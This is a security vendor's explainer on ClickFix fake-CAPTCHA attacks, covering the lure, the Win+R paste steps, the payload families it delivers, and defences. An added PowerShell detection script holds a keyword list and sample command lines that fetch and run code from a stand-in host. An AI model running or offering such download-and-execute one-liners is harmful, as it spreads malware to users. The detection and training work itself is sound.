
What is a ClickFix attack?

ClickFix is a type of social engineering attack that makes people run malware on their own without the attacker needing to use an exploit. It only takes a fake Captcha asking you to prove ‘you’re not a robot’ and a few keystrokes. That's what makes it so effective and so dangerous.

Arsen Team
3 minutes read

ClickFix is a social engineering technique that tricks users into running malicious code on their own computers. ClickFix attacks do not require an exploit or a software vulnerability. All it takes is a fake CAPTCHA asking you to prove ‘you’re not a robot’ and a few keystrokes. That's what makes it so effective and so dangerous.

First detected in April 2024, ClickFix has grown fast. According to ESET data, attacks using this method surged by 517% in 2025 alone. It's no longer a niche tactic used in targeted campaigns; it's a widespread threat hitting firms globally.

How a ClickFix Attack Works

The attack is built entirely on deception. Here's the typical sequence:

  1. The lure. The victim lands on a compromised or fake website, or receives a phishing email, and encounters a pop-up that imitates a CAPTCHA or another legitimate-looking security check. The message is designed to feel urgent and legitimate.

  2. The "fix" button. The pop-up includes a button, often labeled Fix, How to fix, or Verify you're not a robot, that, when clicked, silently copies a malicious script to the user's clipboard.

  3. The three keystrokes. The user is then guided to:

    • Press Win + R to open the Windows Run dialog
    • Press Ctrl + V to paste the (invisible) script
    • Press Enter to execute it

That's it. The user has just run malware on their own machine, with their own privileges, without any warning from the operating system. The name "ClickFix" comes from that "fix" call to action, though not every variant uses one. Some campaigns skip it entirely and frame the interaction as a bot check or a security verification.

[Figure: ClickFix delivery methods]

What Happens After the Click?

Once the script runs, a malicious payload is downloaded and installed. The specific malware varies by campaign, but ClickFix has been linked to some well-known families: Lumma Stealer, AsyncRAT, XWorm, VenomRAT, DanaBot, and NetSupport RAT, among others.

Depending on the payload, attackers can:

  • Steal credentials: passwords, session tokens, banking information
  • Log keystrokes: capturing everything the user types
  • Deploy ransomware: encrypting files and demanding payment
  • Establish persistent access: installing backdoors for long-term control
  • Move laterally: spreading to other devices on the same network

Because the user initiates the command themselves, many traditional security tools don't flag it. The execution looks like a normal user action.

Why ClickFix Is So Hard to Stop

Unlike phishing attacks that rely on a user clicking a malicious link or opening a malicious attachment, ClickFix weaponizes the user's own trust and helpfulness. The victim isn't "tricked into downloading malware"; they run it themselves, following what appear to be reasonable troubleshooting steps of the kind they are already used to performing.

This also means it bypasses a lot of automated defenses. There's no email attachment to scan, no suspicious download to flag. The malicious command arrives via the clipboard and is executed by the user, not by any automated process.

ClickFix can also be used in different delivery situations. For example, a "standard" phishing email will lead victims to a fake landing page with the ClickFix prompt. It could be a fake Google Meet link, a fake Calendar invite, a drive link, or even messages on social media. That flexibility makes it easy to adapt.

[Figure: ClickFix example]

How to Protect Against ClickFix Attacks

ClickFix is fundamentally a human problem, which means the primary defense is human awareness. Technical controls help, but they're not enough on their own.

For organizations:

  1. Train employees on social engineering tactics, including ClickFix scenarios. This is the single most effective defense.
  2. Restrict the Windows Run dialog via Group Policy Objects (GPOs) to limit exposure.
  3. Block or monitor clipboard-based command execution through Windows Event logging.
  4. Restrict execution of mshta.exe and PowerShell from user directories.
  5. Deploy endpoint detection and response (EDR) solutions capable of catching post-execution behavior. Properly configured EDRs also help stop the most common ClickFix attacks.
  6. Implement MFA so that even stolen credentials can't immediately be used.
  7. Keep browsers and operating systems up to date.
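The following PowerShell script is an added example and is not code from the Arsen article or product. It shows the defender side of items 2 to 4 above: it reads the registry values behind the two relevant Group Policy settings ("Remove Run menu from Start Menu" and "Include command line in process creation events"), and it hunts Security event 4688 (process creation) for the ClickFix execution pattern the article describes: a script host such as PowerShell or mshta.exe started directly under explorer.exe (which is what the Win + R Run dialog produces) with a command line that contains download or hiding switches. The indicator list, the two-indicator threshold, the inclusion of cmd.exe and pwsh.exe alongside the hosts named in the article, and the constructed sample events are assumptions to tune for your environment; the 4688 ParentProcessName and CommandLine fields are only populated on current Windows versions with command-line auditing enabled.

```powershell
# Added example (not Arsen's code): hardening check plus a 4688 hunt for the
# ClickFix "Run dialog -> script host -> download" execution pattern.
# Indicator list, threshold and sample data are assumptions, not vendor guidance.

#Requires -RunAsAdministrator

# --- 1. Registry values behind the two GPO settings (read-only; set them via GPO) ---
# "Remove Run menu from Start Menu": User Configuration > Administrative Templates > Start Menu and Taskbar
$runPolicy   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
# "Include command line in process creation events": needed for the CommandLine field in event 4688
$auditPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'

function Get-ClickFixHardeningState {
    $noRun   = (Get-ItemProperty -Path $runPolicy   -Name NoRun -ErrorAction SilentlyContinue).NoRun
    $cmdLine = (Get-ItemProperty -Path $auditPolicy -Name ProcessCreationIncludeCmdLine_Enabled -ErrorAction SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled
    [pscustomobject]@{
        RunDialogDisabled      = ($noRun -eq 1)
        CmdLineAuditingEnabled = ($cmdLine -eq 1)
    }
}

# --- 2. Detection heuristic ---
# Script hosts seen in ClickFix lures. mshta.exe and PowerShell are named in the article;
# cmd.exe and pwsh.exe are added here as an assumption (same Run-dialog pattern).
$scriptHosts = @('powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe')
# Command-line fragments typical of a pasted one-liner (assumed list; extend as needed).
$indicators  = @('http://', 'https://', '-enc', '-e ', 'hidden', 'iwr ', 'irm ',
                 'invoke-webrequest', 'invoke-expression', 'iex', 'downloadstring', 'bypass')

function Test-ClickFixPattern {
    param(
        [string]$NewProcessName,
        [string]$ParentProcessName,
        [string]$CommandLine
    )
    $image  = [System.IO.Path]::GetFileName($NewProcessName).ToLowerInvariant()
    $parent = [System.IO.Path]::GetFileName($ParentProcessName).ToLowerInvariant()
    if ($scriptHosts -notcontains $image) { return $false }
    # Win + R launches the child directly under explorer.exe; a script host started
    # from a console, a scheduled task or another script has a different parent.
    if ($parent -ne 'explorer.exe') { return $false }
    $cmd  = $CommandLine.ToLowerInvariant()
    $hits = @($indicators | Where-Object { $cmd.Contains($_) })
    # mshta.exe pointed at a URL is suspicious on its own; for the other hosts
    # require two indicators so a plain "explorer -> powershell" launch stays quiet.
    $threshold = if ($image -eq 'mshta.exe') { 1 } else { 2 }
    return ($hits.Count -ge $threshold)
}

function Find-ClickFixEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if (Test-ClickFixPattern -NewProcessName $data['NewProcessName'] `
                                 -ParentProcessName $data['ParentProcessName'] `
                                 -CommandLine $data['CommandLine']) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = $data['SubjectUserName']
                Process = $data['NewProcessName']
                Command = $data['CommandLine']
            }
        }
    }
}

# --- 3. Constructed sample events (not real telemetry) to show the heuristic's verdicts ---
$samples = @(
    @{ NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentProcessName = 'C:\Windows\explorer.exe';          CommandLine = 'powershell -w hidden -c "iwr https://example.invalid/verify | iex"' },
    @{ NewProcessName = 'C:\Windows\System32\mshta.exe';                              ParentProcessName = 'C:\Windows\explorer.exe';          CommandLine = 'mshta https://example.invalid/captcha' },
    @{ NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentProcessName = 'C:\Windows\explorer.exe';          CommandLine = 'powershell' },
    @{ NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentProcessName = 'C:\Windows\System32\cmd.exe';      CommandLine = 'powershell -File C:\scripts\backup.ps1' }
)
foreach ($s in $samples) {
    '{0,-6} {1}' -f (Test-ClickFixPattern @s), $s.CommandLine
}
# Expected verdicts: True, True, False, False.

Get-ClickFixHardeningState
Find-ClickFixEvents -Hours 24
```

The parent-process condition is what makes this hunt useful in practice: PowerShell and mshta.exe run constantly on a fleet, but they are rarely started by explorer.exe with a URL or an encoded command on the command line. If `CmdLineAuditingEnabled` comes back `False`, the CommandLine field in 4688 will be empty and the heuristic cannot fire; enable the policy (or use Sysmon event 1, which carries the same Image, ParentImage and CommandLine fields) before relying on it.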

For individuals:

  1. Be suspicious of any webpage or pop-up asking you to press keyboard shortcuts.
  2. Never paste content into a Run dialog or terminal if a website told you to.
  3. Treat any "fix" prompt involving Win + R as a red flag.

No single control eliminates the risk.

ClickFix succeeds because it chains together several small, individually reasonable-looking steps. Defense requires the same layered approach. With Arsen, you can train on social engineering tactics, including ClickFix scenarios. This is the single most effective defense.

Learn more about our ClickFix attack simulations scenarios →


Discover why Arsen is the reference platform for helping CISOs, cybersecurity experts and IT teams protect their organization against social engineering.

Frequently Asked Questions

ClickFix is a cyberattack technique that tricks users into running malware themselves, by convincing them they're fixing a technical problem. The victim is guided through a few keystrokes (opening a Run dialog, pasting a script, pressing Enter) without realizing they're executing malicious code.

Because it bypasses most automated security tools by having the user run the malicious command, rather than triggering an automated download or exploit. It exploits human psychology, the instinct to fix a problem quickly, rather than any technical vulnerability.

ClickFix has been used to deliver a range of malware, including infostealers like Lumma Stealer, remote access trojans like AsyncRAT and VenomRAT, ransomware loaders, and keyloggers. The payload depends on the specific campaign.

Anyone who uses the internet is potentially at risk. Campaigns have targeted hospitality staff, healthcare professionals, car dealership employees, and everyday users through fake CAPTCHAs and error pages. No industry or user type is immune.

Traditional phishing typically tries to get users to click a malicious link or open an infected attachment. ClickFix goes further: it convinces users to manually run a command. This makes it more difficult for email filters and antivirus tools to catch, since the delivery mechanism is the user's own actions.

The most effective protection is security awareness training. Employees who know what ClickFix looks like are far less likely to fall for it. Technical controls like disabling the Windows Run dialog, blocking mshta.exe, and deploying EDR solutions add important layers of defense, but education comes first.

Learn how Arsen helps firms train employees against ClickFix threat vectors →
